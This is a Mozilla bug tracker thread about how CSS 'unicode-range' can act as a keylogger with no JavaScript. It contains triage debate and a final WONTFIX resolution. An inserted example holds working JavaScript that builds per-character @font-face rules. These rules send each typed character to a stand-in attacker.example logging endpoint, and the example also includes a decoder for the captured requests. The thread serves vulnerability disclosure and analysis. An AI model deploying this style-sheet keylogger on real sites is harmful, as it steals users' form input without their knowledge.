style sheet can read page's text (including input in form control) through abuse of 'unicode-range' descriptor

RESOLVED WONTFIX

Status: RESOLVED WONTFIX
Product: Core
Component: Graphics: Text
Reported: 2 years ago

People

(Reporter: sjw, Unassigned)

Tracking

Version: Trunk
Firefox Tracking Flags: firefox44 affected


Attachments (1)

POC (5.68 KB, text/html)
Description (Reporter), 2 years ago

A POC is already released, marking this as security-sensitive anyway.

Masato Kinugawa describes in his blog how unicode-range can be used as a keylogger. Google marked this issue as won't fix, but it seems that he didn't report it to Mozilla (they will hopefully care a bit more).

Comment 1 (Reporter), 2 years ago

http://mksben.l0.cm/2015/10/css-based-attack-abusing-unicode-range.html
"Source code of page can find out what keys are being pressed" isn't something new; it's been doable for years with DOM events (or, if form controls, reading the value of the control).

Is the claim here that there's a category of things that CSS couldn't previously do, *and* that people are assuming that CSS can't do and reasonably depending on that assumption for security?  (Are there cases where people use external libraries for downloadable fonts that are only linking to CSS and not linking to JS, which already has the ability to do this?)

(There are certainly plenty of existing ways that untrusted CSS could attack a page; linking to style sheets you don't trust has already been a bad idea.)
Summary: Privacy/Security issue with unicode-range spec → style sheet can read page's text (including input in form control) through abuse of 'unicode-range' descriptor
Group: core-security → gfx-core-security
Adding Masato.
Given the lack of description of what the threat is here (who is the attacker, what are they attacking), I think we should open up this bug and mark it as WONTFIX.
(Actually, perhaps INVALID or WORKSFORME makes more sense than WONTFIX, since the issue is that I don't know what the threat being reported is.)
Comment 6 (Reporter), 2 years ago

Created attachment 8690203: POC

You can find a description about a scenario on the linked blogpost.

tl;dr
An attacker can use unicode-range to map characters to a specific url, which will allow him to log user inputs *without* using JavaScript.
Of course this is a spec issue, but maybe we can find a way to mitigate this in Firefox.

I just uploaded the scenario linked in the blogpost with a little modification.
Just open the network monitor and type something in the input field.
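The following is an added illustration of the mechanism the reporter and the linked blog post describe; it is not the attached POC and not code from the blog. It builds the @font-face rules for the unicode-range trick (one rule per character, each pointing at a different URL) and shows the receiving side recovering the leaked characters from the request log. The endpoint https://attacker.example/log is a made-up placeholder, and the request paths fed to the decoder are constructed sample data.

```javascript
// Added example (not from the bug report, the POC or the blog post).
// Demonstrates why a style sheet alone can act as a keylogger: a composite
// font built from many @font-face rules, each limited to one code point by
// unicode-range, makes the browser fetch a distinct URL the first time that
// character is rendered in an element using the font.
// https://attacker.example/log is a hypothetical logging endpoint.

const LOG_ENDPOINT = "https://attacker.example/log";

// Generate one @font-face rule per character. All rules share the family
// name, so together they form a single font; the browser only requests the
// src of a rule whose unicode-range covers a character it actually renders.
function buildKeyloggerCss(chars, endpoint = LOG_ENDPOINT) {
  const rules = [];
  for (const ch of chars) {
    const cp = ch.codePointAt(0).toString(16).toUpperCase();
    rules.push(
      `@font-face {\n` +
      `  font-family: "leak";\n` +
      `  src: url("${endpoint}?c=${cp}");\n` +
      `  unicode-range: U+${cp};\n` +
      `}`
    );
  }
  // Apply the composite font to form controls so typed text is rendered with it.
  rules.push(`input, textarea { font-family: "leak", sans-serif; }`);
  return rules.join("\n");
}

// Default character set for the rules: printable ASCII (U+0020..U+007E).
function printableAscii() {
  let s = "";
  for (let i = 0x20; i <= 0x7e; i++) s += String.fromCharCode(i);
  return s;
}

// Receiving side: every hit on the endpoint reveals one code point. The
// browser fetches each range once, so the result is the set of distinct
// characters rendered, without order or repetition.
function decodeLeakedChars(requestPaths) {
  const seen = new Set();
  for (const path of requestPaths) {
    const m = /[?&]c=([0-9A-Fa-f]+)(?:&|$)/.exec(path);
    if (m) seen.add(String.fromCodePoint(parseInt(m[1], 16)));
  }
  return [...seen];
}

// Constructed sample log: three font requests and one unrelated request.
const sampleRequestLog = [
  "/log?c=68",
  "/log?c=69",
  "/log?c=68",
  "/favicon.ico",
];

console.log(buildKeyloggerCss("hi"));
console.log(decodeLeakedChars(sampleRequestLog));
```

Two properties of the mechanism follow directly from the code: the leak needs no script at all, only that the page applies the attacker's font family to the control, and because a given unicode-range is fetched only once, the server learns which distinct characters were typed but not their order or repetitions. A control that masks its value renders the mask glyph rather than the typed character, so only that glyph's range would trigger a request.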
Comment 7 (Reporter), 2 years ago

Note: You need to allow mixed content for the POC, because it doesn't provide https :(
(In reply to sjw from comment #6)
> An attacker can use unicode-range to map characters to a specific url, which
> will allow him to log user inputs *without* using JavaScript.

Two responses here:

 * that still doesn't say why this is a problem.  Are there people who assume that's not the case?

 * this should be doable with downloadable fonts even *without* unicode-range, so I don't even think there's anything new here.  You just need to actually construct fonts with/without specific characters rather than writing the ranges in CSS.

I guess it looks like I can't actually open up security bugs anymore.
Status: NEW → RESOLVED
Last Resolved: 2 years ago
Resolution: --- → INVALID
(In reply to David Baron [:dbaron] ⌚UTC-8 from comment #8)
> > An attacker can use unicode-range to map characters to a specific url, which
> > will allow him to log user inputs *without* using JavaScript.
> 
>  * that still doesn't say why this is a problem.  Are there people who
> assume that's not the case

There are people who think that if they disable JavaScript they are safe from maliciousness and tracking. They are incorrect, but this surprises them.
Group: gfx-core-security
The behavior Masato Kinugawa describes in his blog is a real effect; WONTFIX seems a more appropriate resolution than INVALID.
Resolution: INVALID → WONTFIX